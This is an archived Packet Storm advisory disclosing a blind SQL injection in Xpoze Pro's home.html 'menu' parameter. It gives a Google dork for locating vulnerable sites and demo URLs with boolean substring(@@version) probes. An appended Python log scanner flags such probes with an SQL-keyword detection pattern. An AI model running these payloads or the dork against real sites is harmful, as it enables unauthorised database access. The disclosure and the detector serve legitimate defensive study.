XPOZE Pro 4.10 Blind SQL Injection

2008-12-12T00:00:00
ID PACKETSTORM:72932
Type packetstorm
Reporter XaDoS
Modified 2008-12-12T00:00:00

Description

                                        
`[■] Xpoze Pro (home menù) <= Blind $ql Injection
  
  
>---------------------------------------<  
  
> AuToR: XaDoS (SecurityCode Team)  
> Contact M&: xados [at] hotmail [dot] it  
> B§g: Blind $ql inJection  
> SIte vuln: http://www.xpoze.org/  
  
>---------------------------------------<  
  
  
[■] ExPL0iT:  
  
Dork: " Powered by Xpoze "  
  
|: http://www.example.com/home.html?menu=[$qL]   
  
  
[■] D£M0:   
  
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5 [NO°°]  
  
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)]   
  
  
  
[■] Th4nKs::  
  
> Str0ke </ >Il pavimento</ >sibilla</ >Lo z00</ >I FoxHound ( goto www.myspace.com/foxhoundindie )
  
  
`
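
A defender-side check for the probes shown in the demo, added here as an example (it is not part of the original advisory or of Xpoze's code): it scans web access-log lines for home.html requests whose menu value is not a plain integer. The log lines are constructed, and treating menu as a decimal ID is an assumption based on menu=110 in the demo URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `menu` value is a plain decimal ID, as in menu=110.
VALID_MENU = re.compile(r"\d{1,10}")
# SQL syntax typical of boolean-based blind probes such as the advisory's demo URLs.
SQL_HINTS = re.compile(
    r"\b(and|or|union|select|substring|substr|mid|ascii|sleep|benchmark)\b"
    r"|@@|--|/\*|'",
    re.IGNORECASE,
)
# Request target inside a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP addresses, invented sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2008:10:00:01 +0000] "GET /home.html?menu=110 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Dec/2008:10:00:05 +0000] '
    '"GET /home.html?menu=110%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 1312',
    '203.0.113.9 - - [12/Dec/2008:10:00:06 +0000] '
    '"GET /home.html?menu=110%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 5120',
    '203.0.113.4 - - [12/Dec/2008:10:00:09 +0000] "GET /home.html?menu=abc HTTP/1.1" 200 1312',
]

def classify_menu(value):
    """Return 'ok', 'invalid' (not an integer) or 'sqli' (SQL syntax present)."""
    if VALID_MENU.fullmatch(value):
        return "ok"
    return "sqli" if SQL_HINTS.search(value) else "invalid"

def scan(lines):
    """Return (line_no, verdict, decoded_menu) for each suspicious home.html request."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/home.html"):
            continue
        # parse_qs percent-decodes the value, so %20 becomes a space.
        for value in parse_qs(url.query, keep_blank_values=True).get("menu", []):
            verdict = classify_menu(value)
            if verdict != "ok":
                findings.append((no, verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any value not classified as ok is one that a server-side integer check on menu would reject before it reaches a query.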